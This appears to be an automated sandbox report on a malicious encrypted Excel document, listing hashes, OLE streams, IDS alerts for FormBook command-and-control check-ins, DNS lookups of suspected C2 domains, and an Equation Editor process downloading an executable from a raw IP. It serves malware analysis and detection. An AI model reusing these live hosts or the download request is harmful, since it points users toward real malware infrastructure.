                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):844800
                                                                                                                                                          Entropy (8bit):7.2201577503513095
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:30gZLSqdlOdVczGeXYVRiVXOEjmpFOfGj+sox7Bt:k8FGOz3ITiFOSmpqm+soxb
                                                                                                                                                          MD5:6A763ED09B2FD9F663BCB0AF7B17D492
                                                                                                                                                          SHA1:6F6919DD3AE4F7FBEFC51F8BFC280078A7634BEE
                                                                                                                                                          SHA-256:BA2963B7DA8A1DF3E40441825654972CE2A5903C9F27BC081E42795C296C80EB
                                                                                                                                                          SHA-512:F87F4D58A02CF9DDBB4CDA9E0309EBD393B4F98DC63BAAD92559CD7D932C2AF4C52B64FAA8774F040A994FA158619DF14E7F2E1DC48DE7C45714840291AA968A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.._..............P.................. ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........>..........C...h6...............................................+.&..(....*6+.&...(.....*...0...................... +.. ..A.X *.%.Y ....a ....c;h....... .h.. .h..aYE...._...*.......R....... .s.&e f.7.Y ....cfYE....d...L...8w... Dx..e #...a ].!.X ....c* +.T.efe ...Y* ....f ....c* .... ..N.Y ..b.X* .I~. *h..a .M..X .<)a* .uR. e...Y >9..a .L..Y* ..f. ..o.Y ....a /...X ....Y*...0..........+.&..s.........+F..!a.+...&a8......&X+@..(=....+....YE....8...J...\...n.........

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:CDFV2 Encrypted
                                                                                                                                                          Entropy (8bit):7.9958224135019424
                                                                                                                                                          TrID:
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                          File name:NEW 01 13 2021.xlsx
                                                                                                                                                          File size:1511936
                                                                                                                                                          MD5:9aa0898ded04a2ee18d7b0074413ac94
                                                                                                                                                          SHA1:59c525a0dd116c9f7ec4b5773a7131ef49a29ad9
                                                                                                                                                          SHA256:d6823f8eaf8a072000df7cc5811f35e58f63182657c67f7d99874d7f534851e8
                                                                                                                                                          SHA512:25707274e903241497c05f830c84ec20f67c73cbceebfedcacc1ae4bce8e1e21c7529ad7747a7d04a1bae33710ceacae9c68e1e8fe8663d90a7117ca6cf2d343
                                                                                                                                                          SSDEEP:24576:E+t5yGH1B4ZAoV8c7Wpcma3kMjj3mlc5sghWJ/ZxjNWsaSe4Pno:Ek5yGHcP8Q8cFjUcmQWlwx8Po
                                                                                                                                                          File Content Preview:........................>...............................................................................................z.......|.......~...............z.......|.......~......................................................................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "NEW 01 13 2021.xlsx"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:False
                                                                                                                                                          Application Name:unknown
                                                                                                                                                          Encrypted Document:True
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:False

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:64
                                                                                                                                                          Entropy:2.73637206947
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:112
                                                                                                                                                          Entropy:2.7597816111
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:200
                                                                                                                                                          Entropy:3.13335930328
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/Version
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:76
                                                                                                                                                          Entropy:2.79079600998
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 1495896
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptedPackage
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:1495896
                                                                                                                                                          Entropy:7.99984749113
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:C . . . . . . . q . m B . r . ' p q . . . . . . . . . . ] . . . . . . + . l . . . . . . r m A . . . . . . . . > + . . . ; * . . h . . L . 8 [ : b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . .
                                                                                                                                                          Data Raw:43 d3 16 00 00 00 00 00 71 a8 6d 42 fd 72 10 27 70 71 8e fe b9 ef ff 06 f4 8a 8f 18 5d ab ff ea 09 df a0 2b e6 6c fe cd 11 e1 d2 87 72 6d 41 93 a9 a5 ed df e2 f4 9e 3e 2b b4 9e 86 3b 2a c0 9b 68 fa ec 4c e1 38 5b 3a 62 c0 ab 33 3d e4 14 b5 28 ba 83 76 68 04 f4 55 62 c0 ab 33 3d e4 14 b5 28 ba 83 76 68 04 f4 55 62 c0 ab 33 3d e4 14 b5 28 ba 83 76 68 04 f4 55 62 c0 ab 33 3d e4 14 b5
                                                                                                                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptionInfo
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:224
                                                                                                                                                          Entropy:4.54485651778
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . r N w . . ~ . ( . 1 . . . . K . 8 . ? z . . s l . E y . . . . . . . i i s Q . [ . l + . . . t . H . . ` . - + . . . . . . 4 . . .
                                                                                                                                                          Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                          Network Behavior

                                                                                                                                                          Snort IDS Alerts

                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                          01/13/21-17:17:31.650222TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.2218.195.87.136
                                                                                                                                                          01/13/21-17:18:46.505368TCP1201ATTACK-RESPONSES 403 Forbidden804916634.102.136.180192.168.2.22
                                                                                                                                                          01/13/21-17:18:57.357280TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2254.254.26.94
                                                                                                                                                          01/13/21-17:18:57.357280TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2254.254.26.94
                                                                                                                                                          01/13/21-17:18:57.357280TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2254.254.26.94

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 13, 2021 17:17:31.609026909 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.649702072 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.649808884 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.650222063 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.691555023 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.691584110 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.691596031 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.691620111 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.691659927 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.691692114 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.732214928 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.732251883 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.732274055 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.732285023 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.732295990 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.732307911 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.732316971 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.732320070 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.732327938 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.732345104 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.732361078 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.732368946 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.732381105 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.732394934 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.732419014 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.732430935 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775386095 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775412083 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775429010 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775444984 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775454044 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775461912 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775479078 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775482893 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775487900 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775496006 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775516987 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775521994 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775537968 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775542021 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775547981 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775557995 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775569916 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775573969 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775587082 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775592089 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775604963 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775609016 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775621891 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775626898 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775644064 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775649071 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775655031 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775661945 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.775680065 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.775693893 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.778337002 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816703081 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816739082 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816762924 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816771984 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816787958 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816804886 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816808939 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816812038 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816833019 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816833019 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816839933 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816854000 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816869020 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816874027 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816879988 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816895008 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816910028 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816916943 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816931009 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816940069 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816951036 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816968918 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.816975117 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.816991091 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.817004919 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.817011118 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.817019939 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.817033052 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.817045927 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.817053080 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.817065001 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.817074060 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.817084074 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.817095995 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.817109108 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.817118883 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.817122936 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.817142010 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.817154884 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.817162037 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.817171097 CET4916580192.168.2.2218.195.87.136
                                                                                                                                                          Jan 13, 2021 17:17:31.817183018 CET804916518.195.87.136192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:17:31.817194939 CET4916580192.168.2.2218.195.87.136

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 13, 2021 17:18:41.151473999 CET5219753192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:18:41.232903957 CET53521978.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:18:46.257308960 CET5309953192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:18:46.320647955 CET53530998.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:18:51.518246889 CET5283853192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:18:51.587101936 CET53528388.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:18:56.803368092 CET6120053192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:18:57.172599077 CET53612008.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:19:07.553488016 CET4954853192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:19:07.725017071 CET53495488.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:19:13.132663012 CET5562753192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:19:13.234622955 CET53556278.8.8.8192.168.2.22

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                          Jan 13, 2021 17:18:41.151473999 CET192.168.2.228.8.8.80xccffStandard query (0)www.yjpps.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:46.257308960 CET192.168.2.228.8.8.80x2e78Standard query (0)www.gdsjgf.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:51.518246889 CET192.168.2.228.8.8.80x2f03Standard query (0)www.thepoetrictedstudio.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:56.803368092 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.tuvandadayvitos24h.onlineA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:19:07.553488016 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.acdfr.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:19:13.132663012 CET192.168.2.228.8.8.80xf09aStandard query (0)www.h2oturkiye.comA (IP address)IN (0x0001)

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                          Jan 13, 2021 17:18:41.232903957 CET8.8.8.8192.168.2.220xccffNo error (0)www.yjpps.com0.0.0.0A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:46.320647955 CET8.8.8.8192.168.2.220x2e78No error (0)www.gdsjgf.comgdsjgf.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:46.320647955 CET8.8.8.8192.168.2.220x2e78No error (0)gdsjgf.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:51.587101936 CET8.8.8.8192.168.2.220x2f03No error (0)www.thepoetrictedstudio.comwww110.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:51.587101936 CET8.8.8.8192.168.2.220x2f03No error (0)www110.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:51.587101936 CET8.8.8.8192.168.2.220x2f03No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:51.587101936 CET8.8.8.8192.168.2.220x2f03No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:51.587101936 CET8.8.8.8192.168.2.220x2f03No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:57.172599077 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.tuvandadayvitos24h.onlinedns.ladipage.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:57.172599077 CET8.8.8.8192.168.2.220x3c4eNo error (0)dns.ladipage.comladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:57.172599077 CET8.8.8.8192.168.2.220x3c4eNo error (0)ladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.com54.254.26.94A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:57.172599077 CET8.8.8.8192.168.2.220x3c4eNo error (0)ladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.com52.221.6.123A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:18:57.172599077 CET8.8.8.8192.168.2.220x3c4eNo error (0)ladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.com13.251.251.159A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:19:07.725017071 CET8.8.8.8192.168.2.220x6ec7No error (0)www.acdfr.com199.34.228.73A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:19:13.234622955 CET8.8.8.8192.168.2.220xf09aNo error (0)www.h2oturkiye.comh2oturkiye.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:19:13.234622955 CET8.8.8.8192.168.2.220xf09aNo error (0)h2oturkiye.com94.73.146.42A (IP address)IN (0x0001)

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • 18.195.87.136
                                                                                                                                                          • www.gdsjgf.com
                                                                                                                                                          • www.thepoetrictedstudio.com
                                                                                                                                                          • www.tuvandadayvitos24h.online
                                                                                                                                                          • www.acdfr.com
                                                                                                                                                          • www.h2oturkiye.com

                                                                                                                                                          HTTP Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          0192.168.2.224916518.195.87.13680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2021 17:17:31.650222063 CET0OUTGET /ttkkz/file2.exe HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                          Host: 18.195.87.136
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2021 17:17:31.691555023 CET1INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Jan 2021 16:17:28 GMT
                                                                                                                                                          Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                                                                                          Last-Modified: Wed, 13 Jan 2021 09:32:43 GMT
                                                                                                                                                          ETag: "ce400-5b8c4d239f0b9"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 844800
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-msdownload
